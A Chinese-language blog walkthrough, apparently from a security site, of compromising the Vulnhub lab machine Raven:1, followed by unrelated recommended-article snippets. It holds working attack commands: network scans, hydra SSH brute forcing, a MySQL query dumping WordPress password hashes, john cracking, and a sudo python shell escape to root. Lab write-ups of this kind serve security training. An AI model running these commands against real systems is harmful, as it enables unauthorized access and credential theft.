Vulnhub靶机渗透-Raven:1

访客4年前黑客工具1236

  nmap -p 80,22,21,25,3389,443 192.168.8.0/24

  or

  netdiscover 192.168.8.0/24

  

  来更加深入的扫描一下:

  nmap -sS -sV -T5 -A -p- 192.168.8.156

  

  

  

  首先大致浏览了一遍,发现有个wordpress(建议把域名加入hosts):

  

  用户名MICHAEL,既然是wp那就用wpscan,先更新下漏洞库:

  

  WordPress version 4.8.12

  Theme twentysenventeen version 1.3

  image.png

  同时这个主题也没有发现有什么东西,所以考虑爆一下后台(字典无果可cewl生成):

  爆破的同时我进行了0x03的操作,拿到michael的ssh账号后,可以直接写入shell,并且还没有爆出后台密码,所以停止。

  Open SSH 6.7p1

  并没有发现对应版本的Vunerability,用hydra爆一下:

  hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local

  并没有爆出密码,这里用cupp生成一个新的字典:

  cupp -i

  

  因为我们只知道目标姓名,其他一概不知,所以没有就回车.

  

  爆出了密码,进入看看吧。

  michael@Raven:~$ uname -a

  Linux Raven 3.16.0-6-amd64 #1 *** P Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

  

  没什么可以利用的,再看一下SUID:

  

  没什么可以直接用的,并且michael没有sudo权限,但是发现了flag2.

  

  看一下网站配置文件,或许有root呢?

  

  Mysql的root权限,尝试用这个密码去登录ssh,但是并没有成功,登陆steven也没成功.

  wp_content中发现了flag3

  select * from wp_postsG

  

  所以考虑看一下mysql中存放的wp的密码:

  select * from wp_usersG

  

  michael:$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

  steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

  这直接解肯定解不开了,想用John破解一下(如有shadow和passwd也可用john):

  SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt';

  我们的字典用著名的rockyou,kali自带的:

  接下来用john:

  john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt

  emmm,先破着吧,要上操作系统原理了……

  

  破出了steven的密码,尝试去登录ssh成功,因为前面内核和suid提权均失败,并且michael也没有sudo权限,那么看一下Steven是否有sudo权限:

  sudo -l

  

  尝试用sudo python执行shell:

  sudo python3 -c 'import pty; pty.spawn("/bin/sh")'

  

  emmm,失败……另一种:

  sudo python -c 'import os; os.system("/bin/sh")'

  flag4

  

  0x05 Summary

  本次渗透值得注意的地方就是:

  社会工程学密码字典生成的应用

  john破解HASH的应用

  hydra爆破各种协议的应用

  得到的密码可能通用:例如得到wp的密码可以尝试登陆ssh

  sudo提权

  

  原创投稿作者:Railgun作者博客:www.pwn4fun.com

相关文章

做糖醋菜,别忘了“料酒生抽醋糖水”口诀!保证酸甜酥嫩,浓又香

做糖醋菜,别忘了“料酒生抽醋糖水”口诀!保证酸甜酥嫩,浓又香

做糖醋菜,别忘了“料酒生抽醋糖水”口诀!保证酸甜酥嫩,浓又香,每当说到下饭菜,很多人第1个想到的都是糖醋类菜肴,糖醋排骨、糖醋里脊、糖醋鱼等各式糖醋菜独有的酸甜鲜香、宜人适中、开胃撩人,无论用的是排骨...

黑客大佬穿成女扮男装的高中生(女扮男装黑客少主_)

黑客大佬穿成女扮男装的高中生(女扮男装黑客少主_)

本文目录一览: 1、女主叫傅九的小说穿越 2、女主女扮男装黑客小说 3、求女主是黑客的现言np小说 女主叫傅九的小说穿越 《帝少心头宠:国民校草是女生》,作者是战七少。这本小说讲述的是黑客少...

残疾人驾驶证(2019年残疾人放宽考驾照)

  2019年应该不会继续对残疾手绘鞋加盟人驾考放宽。因为上次放款距今时间水瓶座性格不长,这是其一。其二,无人驾驶汽速勃007车不久就可能上路,残疾人再费劲考他的小可爱驾照意义有限了。将来买个无人驾。...

袋鼠的尾巴有什么作用(世界真奇妙,带你了解

袋鼠的尾巴有什么作用(世界真奇妙,带你了解

陆地上的动物有成千上万种,大多数都长着尾巴,这些尾巴形态各异,作用也不尽相同。 蜘蛛猴的尾巴相当于第三只手 生活在南美的蜘蛛猴,尾巴长达80多厘米,比身体还要长,它们的尾巴有着一道道褶皱,可以增加...

私有云搭建(30分钟搭建私有云)

私有云搭建(30分钟搭建私有云) 随着云盘服务提供商进一步收百思特网紧用户的下载速度,现在市面上几乎已经没有靠谱好使的了。这对于喜欢拍照、收藏高清硬盘的用户来讲只能换上各种大容量的电子设备。——买手...

怀化石锅鱼火锅加盟店经营情况?生意火爆程度难以想象

怀化石锅鱼火锅加盟店经营情况?生意火爆程度难以想象

跟着连年来的成长,逐步的餐饮行业的成长形势是不绝地进步成长的,并且有着越来越多的人开始存眷餐饮饮食产物。暖锅产物是公共消费者一直以来就很是喜欢的产物,并且暖锅产物带来的经济效益也长短常不错的。并且此刻...